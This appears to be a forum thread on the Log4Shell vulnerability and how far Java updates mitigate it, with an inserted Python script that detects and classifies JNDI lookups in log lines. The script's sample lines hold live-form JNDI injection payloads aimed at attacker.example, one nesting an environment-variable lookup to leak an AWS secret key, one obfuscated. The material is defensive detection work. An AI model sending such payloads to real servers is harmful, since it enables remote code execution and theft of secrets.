
As I understand it, if we are running Java 8u121 this is not an issue... or is it?

That's what the CVE (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4422...) says:

> protects against remote code execution by defaulting "com.sun.jndi.rmi.object.trustURLCodebase" and "com.sun.jndi.cosnaming.object.trustURLCodebase" to "false".




It’s still an issue with current JDKs in certain environments (e.g. Tomcat), see https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Inj... and https://www.veracode.com/blog/research/exploiting-jndi-injec....

Also, 8u121 was an incomplete fix, the complete fix (still with limitations as noted above) is in 8u191 (see second link above).


As I understand it, that prevents the RCE, but not other variants like leaking environment variables.
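A detection-side illustration of the two variants this comment distinguishes (a `jndi:` lookup that only points at a remote codebase, versus one that nests a further lookup such as `${env:...}` into the URL so the value leaks to the listener), as an added example that is not part of the thread. The log lines are constructed, and `normalize`, `jndi_lookups` and `classify` are names chosen here, not from any project.

```python
from __future__ import annotations
import re

# Constructed sample lines (not from the thread). The first two mimic the two
# variants discussed above, the third is a lightly obfuscated lookup, the last is benign.
SAMPLE_LINES = [
    'GET / "User-Agent: ${jndi:ldap://attacker.example/a}"',
    'GET / "User-Agent: ${jndi:ldap://attacker.example/${env:AWS_SECRET_ACCESS_KEY}}"',
    'GET / "User-Agent: ${${lower:j}ndi:rmi://attacker.example/x}"',
    'GET / "User-Agent: Mozilla/5.0 (X11; Linux x86_64)"',
]

# Lookups used to hide the literal string "jndi" from naive matching; each resolves to its argument.
_OBFUSCATION = re.compile(r"\$\{(?:lower|upper):([^}]*)\}|\$\{::-([^}]*)\}", re.IGNORECASE)
# Lookups that, when nested inside the JNDI URL, carry process data to the remote server.
_LEAK = re.compile(r"\$\{(env|sys|java|ctx|main):[^}]*\}", re.IGNORECASE)


def normalize(line: str) -> str:
    """Resolve case/default-value lookups repeatedly (bounded) so 'jndi' appears literally."""
    for _ in range(10):
        new = _OBFUSCATION.sub(lambda m: m.group(1) if m.group(1) is not None else m.group(2), line)
        if new == line:
            break
        line = new
    return line


def jndi_lookups(text: str) -> list[str]:
    """Return every brace-balanced ${...} expression whose head is 'jndi:'."""
    found, i = [], 0
    while (start := text.find("${", i)) != -1:
        depth, j = 0, start
        while j < len(text):                     # walk to the matching closing brace
            if text.startswith("${", j):
                depth, j = depth + 1, j + 2
                continue
            if text[j] == "}":
                depth -= 1
                if depth == 0:
                    break
            j += 1
        if text[start + 2:j].lstrip().lower().startswith("jndi:"):
            found.append(text[start:j + 1])
        i = start + 2                            # also inspect nested lookups
    return found


def classify(line: str) -> list[dict]:
    """Describe each JNDI lookup in a log line: scheme, nested lookups, and which variant it is."""
    findings = []
    for lookup in jndi_lookups(normalize(line)):
        target = lookup[2:-1].split(":", 1)[1]   # e.g. ldap://attacker.example/a
        scheme = target.split("://", 1)[0].lower() if "://" in target else "unknown"
        leaks = sorted({m.group(1).lower() for m in _LEAK.finditer(target)})
        findings.append({"scheme": scheme, "nested_lookups": leaks,
                         "variant": "data-exfil" if leaks else "remote-class-load"})
    return findings
```

The "data-exfil" variant is the one the comment refers to: it needs no remote class loading, so the trustURLCodebase defaults quoted earlier do not stop it.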


> other variants like leaking environment variables.

I'll google/search more about these. I assume if we say RCE is a 10 for risk, then maybe others are 5 or 3?


CORRECTION: apparently latest Java is also vulnerable: https://twitter.com/_MG_/status/1470452714203086851



